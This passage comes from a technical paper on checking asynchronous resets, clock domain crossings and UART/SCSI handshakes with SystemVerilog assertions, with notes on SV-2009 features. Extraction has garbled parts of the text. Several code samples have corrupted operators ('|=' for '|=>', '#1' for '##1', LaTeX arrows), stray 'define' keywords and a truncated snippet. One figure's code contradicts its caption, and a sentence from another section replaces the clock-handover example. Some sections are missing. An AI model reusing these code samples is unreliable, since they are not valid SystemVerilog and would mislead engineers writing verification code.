<td>-</td>
<td>0</td>
</tr>
<tr>
<td>0 rise</td>
<td>0</td>
<td>-</td>
<td>-</td>
<td>-</td>
<td>-</td>
<td>unchanged</td>
</tr>
<tr>
<td>0 rise</td>
<td>1</td>
<td>1</td>
<td>-</td>
<td>Data</td>
<td>Data</td>
<td></td>
</tr>
<tr>
<td>0 rise</td>
<td>1</td>
<td>0</td>
<td>0</td>
<td>-</td>
<td>-</td>
<td>Q-1</td>
</tr>
<tr>
<td>0 rise</td>
<td>1</td>
<td>0</td>
<td>1</td>
<td>-</td>
<td>-</td>
<td>Q+1</td>
</tr>
</tbody>
</table>
Using concurrent SystemVerilog assertions, checkers can be easily written to cover the functionality in the counter truth table. For example, several assertions could be written as follows:
default clocking cb @(posedge Clock);
endclocking
// Enable
assert property ( !Enable |=> Q == $past(Q) );
// Load of data
assert property ( Enable && Load |=> Q == $past(Data) );
// Up counting
assert property ( Enable && !Load && UpDn |=> Q == $past(Q)+8'b1 );
// Down counting
assert property ( Enable && !Load && !UpDn |=> Q == $past(Q)-8'b1 );
2.1.1 Disable iff
These concurrent assertions are fairly straightforward; however, they neglect the effect of an asynchronous reset during the assertion evaluation. If a reset occurs, these checks may immediately become invalid. A common mistake is to place the asynchronous control signal in the precondition (also referred to as the antecedent) of the assertion. Adding the asynchronous control into the assertion's precondition stops the evaluation of any new assertion threads, but it fails to affect any existing assertion threads. For example, Figure 1 shows how adding the reset to the precondition seems like it will work, but actually results in false failures.
The most appropriate approach to cope with the asynchronous reset is to use the SystemVerilog disable iff construct. Disable iff provides a level-sensitive control to automatically stop new assertion evaluations and terminate active threads. To fix the assertions in this example, each assertion should have an abort condition specified by adding a disable iff clause in order to work properly in all situations:
// Enable
assert property ( disable iff(Reset) !Enable |=> Q == $past(Q) );
// Load of data
assert property ( disable iff(Reset) Enable && Load |=> Q == $past(Data) );
// Up counting
assert property ( disable iff(Reset) Enable && !Load && UpDn |=> Q == $past(Q)+8'b1 );
// Down counting
assert property ( disable iff(Reset) Enable && !Load && !UpDn |=> Q == $past(Q)-8'b1 );
2.1.2 Checking asynchronous events
While disable iff handles asynchronous assertion termination, what if the asynchronous behavior is the thing to be checked? In the simple counter example, one check is missing—does Q go to 0 immediately upon reset? Since concurrent assertions require a sampling event, one might be tempted to write a concurrent assertion as follows:
assert property(@(posedge Reset) Reset |=> Q == 0 );
At first glance, this looks like it works because Q is being checked for 0 after the reset signal occurs. However, that is not actually the case. In order to understand what is happening, the SystemVerilog scheduling semantics need to be considered.
Guideline 1: Always use disable iff to asynchronously terminate active assertions threads.
Before SystemVerilog, a Verilog simulation only had a few scheduling regions: active, inactive, non-blocking assignment (NBA), and the monitor/strobe regions. All blocking assignments and statements are scheduled in the active region, while non-blocking assignments are scheduled to evaluate later after all active assignments and statements have been executed. This gives non-blocking assignments their characteristic behavior of updating at the end of a simulation time slot.
SystemVerilog, on the other hand, has greatly expanded the number of simulator regions in order to evaluate correctly the new constructs introduced like assertions, clocking blocks, and programs. The Preponed region was introduced to properly handle assertions. As simulation time advances, the Preponed region is at the beginning of each new simulation time slot and proceeds before any events or assignments are generated from always or initial blocks (see Figure 2). The SystemVerilog standard requires that all values used to evaluate concurrent assertions must be sampled during the Preponed region ([3], section 17.3). This means that the values are always sampled before any sampling event triggers the assertions to evaluate, making all assertions synchronous to the sampling event and avoiding any changes or metastability issues on the assertion inputs.
Unfortunately, the way the concurrent assertion semantics are defined makes it difficult to check asynchronous behavior during the same time slot as the asynchronous event. In the simple counter example, the assertion above will never succeed for two reasons. First, the precondition checks to see if Reset is 1, which seems sensible since a posedge Reset triggers the assertion. However, assertions use input values sampled in the Preponed region, or the value just before the posedge of Reset occurs; i.e., a value of 0. Since Reset equals 0, the precondition always evaluates false. A way to work around this would be to set the precondition to true in order to force the check:
```
assert property (@(posedge Reset) 1 |-> Q == 0);
```
Using this precondition causes the assertion to evaluate, but raises a second issue. As with the Reset value, the value of Q will always be the value before the posedge of Reset. Considering the simple up-down counter, Q is reset to 0 using a non-blocking statement, which means that Q does not update until the NBA region long after Q is sampled in the Preponed region. Figure 3 illustrates this point. The assertion could be re-written to use `@(negedge Reset)` instead, but the behavior of Q during reset might be unstable and that would never be detected by the check.
The solution to the problem is to sample the input values at a different simulation time. Therefore, the key to checking asynchronous behavior after an asynchronous control is to delay either the evaluation of the check or the sampling of the assertion inputs. There are many ways to accomplish this and the following offers some possible solutions.
**Guideline 2: The key to checking asynchronous behavior is to delay either the evaluation of the checking or the sampling of the assertion inputs.**
**2.1.2.1 Synchronously checking**
The most common way to check asynchronous behavior is to synchronously sample the assertion inputs. While this is usually sufficient, it is essentially a “cheat” and lacks the assurance that all behavior has been thoroughly checked (see Figure 4).
```
assert property (@(posedge Reset) 1 |-> Q == 0);
assert property (@(posedge Clock) 1 |-> @(posedge Clock) Q == 0);
```
**Figure 4. Synchronously sampling asynchronous behavior.**
Sometimes, the clock frequency may not be fast enough to sample the asynchronous behavior so an oversampling fast clock could be
used. Often, this is used with hardware emulators or to catch glitches that occur on the asynchronous signals. Even so, it is the author’s opinion that synchronous sampling of asynchronous behavior should only be used when necessary since there are better asynchronous ways to write checkers that do not open the possibility of missing spurious transitions between sampling events.
2.1.2.2 Immediate assertions
Immediate assertions have the advantage that they evaluate at the point that they are executed whichever simulation region that may be. Using immediate assertions, the asynchronous reset assertion could be written as:
```verilog
always @(posedge Reset) assert (Q == 0);
```
As with the earlier concurrent assertion example, this looks like it should work; however, again there is the issue of when the immediate assertion evaluation takes place. Immediate assertions execute by default in the Active scheduler region. In the design, Q is being updated by a non-blocking assignment so it is being updated after the assertion check evaluates during the NBA region.
Considering Figure 2, the only way for the checking of Q to evaluate correctly is for the assertion to execute in either the Observed, Reactive, Re-inactive, or Postponed regions since they all evaluate after the design has updated the value of Q in the NBA region. The Postponed region is only available to PLI routines (like Smonitor and Sstrobe) or clocking block sampling, leaving the Observed, Reactive, and Re-inactive regions to evaluate the assertion. There are several easy approaches to accomplish this: use a (1) program block, (2) a sequence event, (3) the expect statement, (4) a non-blocking trigger event, or (5) a clocking block.
2.1.2.2.1 Program blocks
Program blocks are designed intentionally to execute after all events are evaluated in the design in order to avoid race conditions between the testbench and the design. A program block’s inputs are sampled in the Observed region, and any initial blocks within a program are scheduled to execute in the Reactive region ([3], section 16.3). By placing the immediate assertion in a program, Q will have the reset value when the check is evaluated.
```verilog
program tester;
initial forever
@(posedge Reset) assert (Q == 0)
else $error("Q != 0 after reset!");
endprogram
```
Note, program blocks can be nested inside of modules or interfaces so that they have visibility to signals in the local scope, but not all simulators support nested programs. Thus, one disadvantage to this approach is that it requires hierarchical references to probe the design signals, unless the program is bound (using bind) into the design hierarchy.
2.1.2.2.2 Sequence events
A sequence event is an alternate approach to using programs. Sequences define a series of temporal events and can be used to block the execution of statements until the sequence has been matched. The SystemVerilog standard defines that the end-point status for a sequence is set in the Observed region of simulation. Therefore, waiting upon the completion of a sequence by either using a sequence method like .ended, .matched, or .triggered, or using @/(sequence) will delay the execution of subsequent statements until after the Observed region ([3], sections 10.10.1 and 17.12.6).
For example, the same reset check could be written as:
```verilog
sequence reset_s;
@(posedge Reset) 1;
endsequence
always @(reset_s) assert (Q == 0);
```
The advantage of using sequence events is that each asynchronous control can be defined as a named sequence and then used appropriately in any always or initial block in modules, interfaces, or programs. Sequence events provide a great alternative to delay assertion input sampling, but be aware that not all simulation tools fully support them yet.
2.1.2.2.3 Expect statements
Perhaps providing the best compromise between immediate and concurrent assertions is the SystemVerilog expect statement. Expect is a procedural statement for use within always or initial blocks, but it also understands the temporal property syntax available to concurrent assertions. For example, an expect statement can use properties such as this:
```verilog
initial
expect(@(posedge clk) a ##1 b ##1 c) else $error;
```
Fortunately, expect is a great construct for checking asynchronous behaviors. The SystemVerilog standard states that the statement after expect is executed after the Observed region ([3], section 17.16). Therefore, using expect, immediate assertions can be executed after the Observed region as follows:
```verilog
always
expect(@(posedge Reset) 1) assert (Q == 0);
```
Unfortunately, not all major simulators execute the expect statement and subsequent statements after the Observed region. To compensate, the assertion evaluation can be delayed to at least the NBA or Observed region by waiting for the change to occur on Q:
```verilog
always
expect(@(posedge Reset) 1) @Q assert (Q == 0);
```
However, waiting for Q to change may be problematic. For instance, if Q is already 0 when Reset occurs, then the assertion would fail to check until the first non-zero change of Q, resulting in a false failure. Instead, the expect statement can be placed inside of a program block to delay the sampling of the assertion inputs:
```verilog
...
2.1.2.2.4 Non-blocking event trigger
Another trick to delay the sampling of an immediate assertion’s inputs is to use a non-blocking event trigger (\(\rightarrow\)). Traditional Verilog provides an event trigger (\(\rightarrow\)) that is evaluated immediately and only for the current simulation time step. The non-blocking event trigger delays its evaluation to the non-blocking assignment (NBA) region of the current or future time step. In the counter example, \(Q\) is updated in the NBA region using a non-blocking assign. By waiting for a non-blocking event trigger, the assertion is also delayed until the NBA region. For example,
```verilog
always @ (posedge Reset)
begin
event t;
\(\rightarrow\) #0 t;
@ (t) assert ( Q == 0 );
end
```
However, this non-blocking trigger evaluates during the same simulation time as the RTL is resetting \(Q\), which essentially creates a race condition depending on the order that the simulator evaluates the two processes. In some simulators, the non-blocking trigger always occurs at the appropriate time after the RTL has been updated; in others, it depends on whether the assertion is co-located with the RTL code or in a separate module.
In order to guarantee the correct input sampling, a #0 delay can be placed before the assertion to cause the assertion to be further delayed until the RTL has finished evaluation:
```verilog
always @ (posedge Reset)
begin
event t;
\(\rightarrow\) t;
@ (t) #0 assert ( Q == 0 );
end
```
As the simulator processes the NBA events, they are promoted to the Active region where they are evaluated as shown in Figure 5:
Figure 5. Verilog indeterminacy does not affect the assertion evaluation when using a non-blocking trigger and #0 delay.
The assertion is further delayed to the Inactive region, causing the RTL assignment to \(Q\) to always evaluate beforehand regardless of the order that the non-blocking events were scheduled. Using the #0 delay, the race condition between non-blocking events is eliminated and the assertion can be placed either in the RTL code or elsewhere. Incidentally, until recently not all major simulators supported non-blocking event triggering, but now the latest versions generally have good support.
2.1.2.2.5 Clocking blocks
Clocking blocks can delay the sampling of inputs used in immediate assertions. By default, clocking blocks sample using \#1step, which is equivalent to the Postponed region of the previous time slot or the Preponed region of the current. Sampling can be delayed until the Observed region by specifying the input delay to be #0 instead. By using a clocking block input in the immediate assert, the value of \(Q\) will already be updated from asynchronous reset:
```verilog
clocking cb @ (posedge Reset);
input #0 Q;
// Delay sampling
endclocking
always @ (posedge Reset)
assert ( cb.Q == 0 );
```
Notice that the clocking block samples with respect to the asynchronous reset. Because the input delay is specified as #0, the value used for \(Q\) comes from the Observed region after the updated RTL reset value was set in the NBA region.
Using the reset as the clocking block’s sampling event creates a potential race condition between updating the clocking variable \(cb.Q\) and sampling \(cb.Q\) from the assertion the first time \(Reset\) occurs. Assuming \(Q\) is 4-state and the assertion process evaluates first, then a erroneous value of X will be sampled before the clocking variable \(cb.Q\) is updated, resulting in a false failure. With some simulators, it is enough to wait on the clocking block before evaluating the assertion like this:
```verilog
always @ (posedge Reset)
@cb assert ( cb.Q == 0 );
```
Given the possibility of a false failure, this method should be used with care.
Guideline 3: Immediate assertions can check asynchronous events if evaluated in the Observed or Reactive simulation regions.
2.1.2.3 Concurrent assertions
While concurrent assertions sample synchronously and so have a disadvantage when used for asynchronous checking, there are a few tricks to make them work without resorting to sampling off a clock. As previously discussed, the key to checking asynchronous behaviors is to delay the checking or the sampling of the inputs. Clocking blocks cannot be used as with immediate assertions because the SystemVerilog standard explicitly states that clocking block inputs used by concurrent assertions must be sampled using \#1step, not #0 ([3], section 17.3). Nonetheless, there is still a way to delay the input sampling or the assertion checking by delaying the sampling trigger or calling subroutine methods using matched sequences.
2.1.2.3.1 Delays in asynchronous control
While it may seem like “cheating” just like sampling using a clock, delaying the asynchronous control signal slightly to allow the RTL to finish evaluation is really one of the easiest and simplest approaches to checking asynchronous behavior. In the counter example, the original concurrent assertion can be used but with the Reset signal delayed just enough for the RTL to reset. The value of Q:
```verilog
assign #1 trigger = Reset;
assert property( @(posedge trigger) 1 |-> Q==0);
```
Since there is no unit specified with #1, the delay will be 1 unit delay. Normally, this is sufficient but the smallest precision time unit could also be used. Some simulators allow the use of the #1step keyword, which represents the global time precision:
```verilog
assign #1step trigger = Reset;
assert property( @(posedge trigger) 1 |-> Q==0);
```
Using #1step guarantees that no action is missed between the time slot that the Reset occurs and when the value of Q is reset. Not all simulators implement #1step so a hard coded value is usually adequate.3 Note, using a delay with a continuous assignment statement is easiest, but a separate process could also be used to delay Reset or create a named event to trigger the assertion evaluation.
```verilog
assign #1 trigger = Reset;
assert property( @(posedge trigger) 1 |-> Q == 0 );
```

### Calling subroutines on matched sequences
While the SystemVerilog standard restricts the sampling of concurrent assertion inputs to the Preponed region (i.e., the value before the sampling event), it does not restrict the sampling of the inputs used by tasks or functions called by an assertion sequence. In fact, a subroutine called by a sequence is specifically defined to evaluate in the Reactive region ([3], section 17.9), allowing the inputs to be sampled after the RTL design has finished updating from any asynchronous events.
For example, consider the following task:
```verilog
task automatic check( ref logic [7:0] data,
input logic [7:0] value );
assert ( data == value );
endtask
```
The check() task accepts any 8 bit variable or wire and compares it to value. Notice, the data is passed using ref, which is important because otherwise the Preponed value will be passed. Since ref is required, the task must be automatic to work properly in some simulators. Now the task can be called in a concurrent assertion in the following manner:
```verilog
assert property( @(posedge Reset) 1 |->
(1, check( Q, 0 )));
```
or in a named sequence:
```verilog
sequence check_q_eq_0;
(1, check( Q, 8'b0 ));
endsequence
assert property( @(posedge Reset) 1 |->
check_q_eq_0);
```
Because the task is evaluated in the Reactive region, the value of Q is read at that time, giving the updated RTL value after the asynchronous reset occurs. The same could be done with a function, but not all simulators evaluate functions or sample their inputs in the Reactive region as the standard specifies. Nonetheless, a generally portable solution is as follows:
```verilog
function bit check_q( input logic [7:0] value );
return ( Q == value );
endfunction
assert property( @(posedge Reset) 1 |->
check_q( 0 ));
```
or using a named sequence:
```verilog
sequence check_q;
check_q( 0 );
endsequence
assert property( @(posedge Reset) 1 |-> check_q );
```
The drawback to this approach is that the variable (or wire) being checked cannot be passed as an argument but must be hard coded inside the function so that it is sampled at the appropriate time. As a result, using the task version is a more flexible and preferable solution.
---
3 One major simulator disallows #1step outside of a clocking block, but allows the non-standard use of #step in an assignment statement to accomplish the same result.
assertion could have been written using @(posedge Q), but simulation tools might interpret this as a non-zero Q[0] or the entire vector Q. Instead, a more cautious approach is preferred of detecting a negedge transition using the true/false expression result of (Q==0).
2.1.3.2 Timing simulations
Delaying the input sampling on an asynchronous assertion works as long as there are no timing delays in the design RTL. Most of the methods shown in this section evaluate the assertions at the same simulation time as the asynchronous control signal occurs, which would not work with a design that includes delays such as a gate-level netlist. In this case, several easy options exists that could be used to delay the assertion checking long enough for Reset to propagate through the design and Q to be updated:
1. Sample synchronously as shown in 2.1.2.1:
```
assert property {
@(posedge Clock) Reset |= Q == 0 }
```
2. Delay the asynchronous control signal as shown in 2.1.2.3.2:
```
parameter gatedelay = 10;
...
assign #gatedelay trigger = Reset;
assert property ( @(posedge trigger) 1 |= Q==0);
```
3. Delay the assertion checking a fixed amount of time:
```
always @(posedge Reset)
#gatedelay assert ( Q == 0 );
``
OR
```
always @(posedge Reset) begin
event t;
@Q assert ( Q == 0 );
end
```
4. Delay the assertion checking until the RTL changes:
```
program tester;
initial forever
begin // Signals visible to program
@Q assert ( Q == 0 && Reset );
end
endprogram
```
Option 1 generally works provided Reset lasts longer than one clock period; a fast sampling clock could also be used. Options 2 and 3 generally work, but may require some trial and error to find the correct sampling delays that work.
Option 4 is essentially immune to timing delays since it triggers on events, but poses its own set of difficulties. First, if Q already equals 0, then the assertion never performs its check (this is required if Q equals 0 to prevent a false failure occurring when Reset is released and Q starts changing). Second, in a gate-level simulation glitches may occur on Q resulting in false failures. Third, a concurrent assertion cannot be used for this check since the value of Q will be sampled in the Preponed region instead of after the RTL has updated Q; therefore, the assertion needs to be delayed using a program block or other method previously discussed in order to correctly sample the assertion’s input value(s). Fourth, there is no guarantee that Q actually changes on the same Reset that triggered the evaluation! If Q fails to change and Reset is de-asserted and re-asserted, then the assertion may not check the value of Q until a subsequent occurrence of Reset.
5. Create a multi-clocked sequence:
```
parameter TIMEOUT = 2;
assert property ( @posedge Reset) 1 |=
@(Clock) #(1:TIMEOUT) Q == 0 && Reset
);
```
Probably the best compromise is Option 5—sampling using the clock once the Reset triggers the assertion evaluation. Instead of waiting for Q to change, a parameterized timeout value can be specified so if Q never changes before Reset de-asserts then an error is flagged. This allows the use of a concurrent assertion, and changing the timeout number of clock edges to sample is much simpler than adjusting hard-coded timing delays anytime the gate-level netlist changes. This type of assertion is referred to as a multi-clocked sequence and is discussed in detail in the next section.
```
Guideline 5: For timing simulations, synchronously checking the design’s behavior upon the asynchronous event is probably the best overall solution.
```
2.2 Asynchronous communication
The second major category of asynchronous behavior is asynchronous communication. In most designs, asynchronous communication commonly occurs between two independent clocks domains or with an asynchronous interface protocol. Checking asynchronous communication is usually easier than asynchronous controls because the signals or data being checked are typically setup and ready for sampling before the sampling event occurs. The exception to this occurs between clock domains when the independent clocks happen to occur at the exact same simulation time. While this may be unlikely, even if it does happen it is usually not a problem because sampling is simply delayed to the next clock edge; whereas, with asynchronous controls, there is no following control signal to perform the sampling so other methods are required such as those outlined in the preceding sections.
The SystemVerilog standard has extensively defined the semantics for multi-clock support, which can be used to sample events across clock domains as well as asynchronous protocols. The basic principles will be presented here; however, refer to [3] for more specific and in-depth details.
2.2.1 Clock domain crossing
The first type of asynchronous communication to consider is clock domain crossing. The key to building multi-clocked sequences is using the concatenation operator ##. In a singly clocked sequence, the concatenation operator represents one clocked sequence and is discussed in detail in the next section.
Here, \texttt{sig\_a} is sampled using \texttt{clk1} and \texttt{sig\_b} using \texttt{clk2}. The \#\#1 joins the two differently clocked sequences together, also known as clock handover (see Figure 7). In fact, it is illegal to use \#\#0, \#\#2, or any other cycle delay operator besides \#\#1. Likewise, the non-overlapping implication operator can be used between differently clocked sequences, but the overlapping implication operator is not allowed. The clock flows through an implication operator and sequence until another sampling clock is encountered.
Figure 7. Example of using \#\#1 clock handover between differently clocked sequences.
The concatenation operator also requires that \texttt{clk2} is strictly subsequent, i.e., not occurring at the exact same simulation time slot as \texttt{clk1}. If it does, then \texttt{sig\_b} will not be sampled until the next subsequent occurrence of \texttt{clk2}.
Using clock handover when crossing clock domains seems rather straightforward, but the duration of \#\#1 may be arbitrarily short, which may not provide the setup and hold time necessary to avoid timing hazards. Consider the scenario in Figure 8 where the \texttt{strobe} signal is generated in the \texttt{src\_clk} domain and must be stable for at least 3 cycles in the \texttt{dst\_clk} domain. An assertion must check that the \texttt{strobe} signal remains stable but also that it has the adequate setup and hold time to be sampled in the \texttt{dst\_clk} domain.
Figure 8. \#\#1 is arbitrarily short so timing hazards may occur.
One possible solution would be to describe the \texttt{strobe} signal in both clock domains and match the two sequences together. The \texttt{intersect} operator can easily accomplish this, but the beginning and end points must occur at the same time or with the same starting and ending clocks. Using \texttt{intersect}, the assertion can be described as:
\begin{verbatim}
assert property {
@(posedge src_clk) $rose(strobe) |-> (
strobe[*1:$] \#\#1 1
)
intersect (
\#\#1 @(posedge dst_clk) strobe[*3] \#\#1
@(posedge src_clk) 1
)
};
\end{verbatim}
Since the \texttt{intersect} operator requires the same end points, the additional \#\#1 is appended to the \texttt{src\_clk} sequence so that it can match the end of the \texttt{dst\_clk} sequence. Likewise, the \texttt{dst\_clk} sequence switches to the \texttt{src\_clk} domain to complete its sequence, giving it the same ending point as the \texttt{src\_clk} sequence. Figure 9 illustrates how the two sequences synchronize together. The assertion satisfies both the stability and timing checks since the sequences combined ensure that the \texttt{strobe} signal remains asserted for the required number of cycles. For a more in-depth discussion on clock domain crossing and jitter as well as an example of a multi-clocked asynchronous FIFO, refer to [5].
Figure 9. Assertion for clock domain crossing.
\textbf{Guideline 6:} The key to writing assertions for clock domain crossing is proper understanding and handling of the clock handover using $l\Rightarrow$ or \#\#1.
\subsection*{2.2.2 Asynchronous interface protocols}
An asynchronous interface protocol is one that either sends information without an accompanying clock or one that uses an asynchronous handshaking mechanism. While the interface may be asynchronous, the design will still use a clock to sample the asynchronous data or transfer the information over the interface. Because a clock is used, writing assertions for asynchronous interfaces can be as simple as writing a synchronous property, or at worst a multi-clocked sequence since the handshaking signals can be treated like different sampling clocks. With handshaking, the data is setup beforehand so sampling the data is typically not an issue as discussed previously with asynchronous control signals.
\subsubsection*{2.2.2.1 Serial UART Interface Example}
A classic example of an asynchronous protocol is the universal asynchronous receiver / transmitter—commonly known as a UART. More recent UARTs support synchronous transfers, but they still support asynchronously data transfer. The protocol requires that both the receiver and transfer agree beforehand the baud rate to transmit, and then both set their internal clocks to the same frequency.
The protocol is considered asynchronous because no clock signal is transmitted with the data. The sampling of the data is accomplished by using a fast clock to detect the start of the transfer, and then generate a sampling clock from the fast clock that samples in the middle of each data bit. A simple ready-to-send (RTS) and clear-to-send (CTS) handshaking is used to start the data transfer.
Since a sampling clock is used, writing the assertion for the serial data transfer is very straightforward. The beginning of the transfer can be detected by using a sequence to wait for the RTS/CTS handshake:
```systemverilog
define sequence handshake;
@(posedge rts) 1 #1 @(posedge cts) 1;
endsequence
```
The #1 in this sequence performs the clock handover between the two signals. Recall from section 2.1.2 that using `@ (posedge rts)` or `@ (posedge cts)` does not work properly because the value of `rts` and `cts` will be sampled before the rising edge occurs.
To check that the data is sent correctly, a sequence with a local variable is used to capture each bit and then check the parity at the end of the sequence. The internal sampling clock is used to capture the bits:
```systemverilog
define sequence check_trans;
logic [7:0] tr; // Local variable
@(posedge sample_clk) 1 #1 // Skip start bit
(1, tr[0] = data) #1 (1, tr[1] = data) #1
(1, tr[2] = data) #1 (1, tr[3] = data) #1
(1, tr[4] = data) #1 (1, tr[5] = data) #1
(1, tr[6] = data) #1 (1, tr[7] = data) #1
data === ^tr // Check parity
data === 1; // Check stop bit
endsequence
```
With the two sequences defined, the two can be synchronized using the non-overlapping implication operator to handover the clock between the sequences:
```systemverilog
assert property (handshake |=> check_trans);
```
Notice using multi-clock semantics, both the synchronous and asynchronous behaviors can easily work together as illustrated in Figure 10.

SystemVerilog also defines the sequence method `.matched` that can be used to detect the end of a sequence sampled in a different clock domain. Using `.matched` instead, the assertion could have been written as:
```systemverilog
assert property {
@(posedge sample_clk) handshake.matched |=> check_trans
};
```
The matched method retains the end state of the sequence until its next evaluation. No clock handover is required because the end state is simply sampled using `sample_clk`. The `.matched` method is often an easier way to describe clock domain crossing than matching sequence end points with the `intersect` method as shown in Figure 9.
### 2.2.2.2 SCSI Interface Example
While the UART protocol operates asynchronously, data is still sent in a synchronous manner because both sides agree to a transmission frequency. Handshaking is used to start the transfer, but many other protocols use handshaking as their primary way to transfer data. The SCSI protocol is one such interface used primarily to transfer data to peripheral interfaces like hard disk drives. The SCSI protocol involves both an arbitration handshaking phase and an information transfer handshake (see Figure 11). For purposes of this paper, just the information transfer handshake will be considered.

The SCSI protocol passes messages and data, and uses the three signals C/D, I/O, and MSG to define the transfer type. The initiator requests a transfer using `REQ` and the receiver acknowledges with `ACK`. The data is transferred over differential pairs and is sampled upon arrival of the `ACK` signal.
A simple assertion check would be to check that the data sent by the initiator properly appears on the SCSI interface. The assertion should detect when the design is ready to transfer by synchronously sampling the design’s FSM and the data to be transferred. While the initiator will assert the `REQ` signal using its internal clock, it is just as easy to write a multi-clocked property to describe the `REQ/ACK` handshake. Using a local variable to capture the data, the data is then checked by the assertion on the data bus when the `ACK` signal arrives:
```systemverilog
4 SCSI is an acronym for Small Computer System Interface.
sequence data_cmd; // Valid data command
!cd & io & !msg;
endsequence
property check_data;
data_t txdata; // Local variable
@posedge clk
( state == TX, txdata = datareg )|=>
@(posedge REQ) data_cmd #1
@(posedge ACK) databus == txdata;
endproperty
assert property ( check_data );
Guideline 7: An asynchronous interface can be handled using clock handover in the same way as clock domain crossing.
3. SV 1800-2009 ENHANCEMENTS
The Verilog (IEEE 1364-2005) and SystemVerilog (IEEE 1800-2005) standards have been merged into one unified document known as the SystemVerilog 2009 standard[4]. In addition to merging the two languages, many improvements have been made to the assertion language. This section offers a preview of some of the improvements that should have an impact on handling asynchronous behaviors as discussed in this paper (for a very good summary of SVA changes, refer to [1]).
3.1 Asynchronous abort properties
The SVA language defines disable _iff_ to disable assertions and their actively evaluating threads. In the new standard, disable _iff_ can be applied to assertions globally like the default clocking, making them more concise to write:
default disable _iff_ reset;
The disable _iff_ statement has also been added to the new cover sequence statement:
cover sequence ( @(event) disable _iff_ ( expr )
sequence_expr );
The cover sequence statement is used to record the number of times a sequence is _matched_ versus a cover property that records the number of times a property _succeeds_.
The new standard has also introduced some new constructs to abort assertions in a similar way as disable _iff_ called _abort properties_. There are 2 asynchronous abort properties and 2 synchronous. The asynchronous abort properties take the form:
accept _on_ ( expr ) property_expr
reject _on_ ( expr ) property_expr
where _expr_ represents the _abort condition_. If while the assertion is evaluating the abort condition becomes true, then accept _on_ returns true or reject _on_ returns false; otherwise, the property _expr_ is evaluated. A significant difference with disable _iff_ is how the abort condition is evaluated. The expression used with disable _iff_ uses the current simulation values (i.e., not sampled but level sensitive); whereas, the abort condition for abort properties are sampled the same property values (i.e., in the Preponed region).
3.2 Global clocks
In section 2.1.2.1, synchronously checking using a fast clock was offered as a common solution for checking asynchronous behaviors. The SV-2009 standard defines the semantics for a global assertion clock, which could be used as a fast clock for sampling asynchronous signals. The global clock is defined by using the new keyword _global_ with an unnamed clocking block:
global clocking @clk; endclocking
Once the global clock is defined, many new sample value functions are available:
<table>
<thead>
<tr>
<th>Past value functions</th>
<th>Future value functions</th>
</tr>
</thead>
<tbody>
<tr>
<td>$past_gclk(expr)</td>
<td>$future_gclk(expr)</td>
</tr>
<tr>
<td>$rose_gclk(expr)</td>
<td>$rising_gclk(expr)</td>
</tr>
<tr>
<td>$fall_gclk(expr)</td>
<td>$falling_gclk(expr)</td>
</tr>
<tr>
<td>$stable_gclk(expr)</td>
<td>$steady_gclk(expr)</td>
</tr>
<tr>
<td>$changed_gclk(expr)</td>
<td>$changing_gclk(expr)</td>
</tr>
</tbody>
</table>
These sample value functions provide new ways to define properties to match asynchronous behaviors.
3.3 Procedural concurrent assertions
Generally, concurrent assertions are written to stand by themselves, but they can also be embedded inside of initial and
always blocks. Inside a procedural block, the event control and enabling conditions are inferred from the context if not declared explicitly. While procedural concurrent assertions are evaluated in the simulator’s Observed region ([3], section 17.3), the inputs are sampled as other concurrent assertions in the Preponed region. This poses the same issues when checking asynchronous control signals as discussed in section 2.1, and requires the same solutions presented in section 2.1.2.3.
However, the SV-2009 standard has greatly enhanced the semantics for procedural concurrent assertions. All procedural concurrent assertion inputs are still sampled in the Preponed region save for one exception—inputs declared as const or automatic variables. With const and automatic variables, their values are sampled when the assertion is placed on the assertion queue, effectively causing it to sample its inputs as immediate assertions. For example, the asynchronous reset assertion for the counter example could be written as:
```systemverilog
always @(posedge Reset)
assert property (const'(Q) == 0);
```
An automatic variable will also be treated as a constant and its immediate value used. For example, the assertion could be written as:
```systemverilog
always @(posedge Reset)
begin
automatic byte q = Q;
assert property (q == 0);
end
```
Unfortunately, this feature does not eliminate the difficulty of sampled values with concurrent assertions. The evaluation of the assertion is delayed until the simulation’s Observed region, but the immediate value used for the constant and automatic values is taken when the procedural concurrent assertion is scheduled. Inside a module, always and initial blocks execute in the simulator’s Active region so the assertion will be scheduled in the Active region before the design has updated the value of Q upon reset in the NBA region. In order to make this new feature work, either a timing control would be required before the assertion to delay its scheduling—which is explicitly prohibited by the standard—or the procedural concurrent assertion could be used inside program block to delay its scheduling until the Reactive region (see section 2.1.2.2).
Another change that may benefit describing asynchronous behavior is how the enabling condition for procedural concurrent assertions is handled. For example, an if statement could be used around a procedural concurrent assertion:
```systemverilog
always @(posedge clk)
if (a) // Enabling condition
assert property (check_data);
```
In the current SV-2005 standard, the values used for the enabling condition are sampled in the same manner as the assertion inputs. According to the SV-2009 standard, the enabling conditions will use the immediate values just like constant and automatic inputs. If used in a program block, this will provide another means of checking behavior after the asynchronous signal(s) occur.
### 3.4 Checkers
The SV-2009 standard introduces a new verification block known as a checker. A checker can contain assertions, covergroups, procedural blocks of code, and generate statements much like a module, but modules, programs, interfaces, or packages cannot be instantiated within a checker. Checkers can be used most anywhere a concurrent assertion is used with the exception of fork-join statements. Checkers can also be passed arguments, which will work very much the same as procedural concurrent assertions. If a checker’s arguments are declared as const or automatic, then the immediate values from the checker’s context will be passed. As with procedural concurrent assertions, checkers could be adapted to check asynchronous behaviors if used in the same manner described in the previous section. For an in-depth look at checkers, refer to [1].
#### 3.5 Deferred Immediate Assertions
Deferred assertions are immediate assertions that are delayed in their reporting. The purpose of a deferred assertion is to avoid false failures due to glitches on combinational circuitry. The SV-2009 standard defines the semantics for deferred assertions so that their evaluation works like an immediate assertion, but their action blocks report in the Reactive region. A deferred assertion may be used within or outside of a procedural block and is written as follows:
```systemverilog
assert #0 (expression) pass_action_block else failure_action_block;
```
A deferred assertion follows the same form as an immediate assertion but with the additional #0 notation. Since deferred assertions sample their inputs as regular immediate assertions, the deferred assertions evaluation would need to be delayed to handle asynchronous events as shown previously in this paper (see 2.1.2.2).
### 4. CONCLUSION
In this paper, SystemVerilog assertions have been examined in detail for their ability to handle describing and checking asynchronous behaviors. The harder asynchronous behavior to check are the asynchronous control signals that immediately affect the design like enables and resets. The difficulty lies in how the assertion inputs are sampled preceding the asynchronous trigger. This difficulty can be overcome by using the following guidelines:
- **Guideline 1:** Always use disable iff to asynchronously terminate active assertions threads.
- **Guideline 2:** Delay either the evaluation of the checking or the sampling of the assertion inputs.
- **Guideline 3:** Immediate assertions can check asynchronous events if evaluated in the Observed or Reactive simulation regions.
- **Guideline 4:** Concurrent assertions can check asynchronous events by delaying the asynchronous control or calling a subroutine from a matched sequence.
